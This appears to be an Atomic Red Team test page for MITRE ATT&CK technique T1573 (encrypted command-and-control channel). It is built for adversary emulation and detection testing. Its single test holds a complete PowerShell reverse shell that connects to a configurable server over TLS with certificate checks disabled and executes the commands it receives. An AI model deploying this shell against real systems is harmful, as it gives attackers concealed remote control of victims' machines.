# T1573 - Encrypted Channel ## Description from ATT&CK > Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files. [Source](https://attack.mitre.org/techniques/T1573) ## Atomic Tests - [Atomic Test #1: OpenSSL C2](#atomic-test-1-openssl-c2) ### Atomic Test #1: OpenSSL C2 Thanks to @OrOneEqualsOne for this quick C2 method. This is to test to see if a C2 session can be established using an SSL socket. More information about this technique, including how to set up the listener, can be found here: https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926 Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443. **Supported Platforms:** Windows **auto_generated_guid:** `21caf58e-87ad-440c-a6b8-3ac259964003` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | IP of the external server | string | 127.0.0.1| | server_port | The port to connect to on the external server | string | 443| #### Attack Commands: Run with `powershell`! ```powershell $server_ip = #{server_ip} $server_port = #{server_port} $socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}') $stream = $socket.GetStream() $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) $sslStream.AuthenticateAsClient('fakedomain.example', $null, "Tls12", $false) $writer = new-object System.IO.StreamWriter($sslStream) $writer.Write('PS ' + (pwd).Path + '> ') $writer.flush() [byte[]]$bytes = 0..65535|%{0}; while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0) {$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data | Out-String ) 2>&1; $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()} ```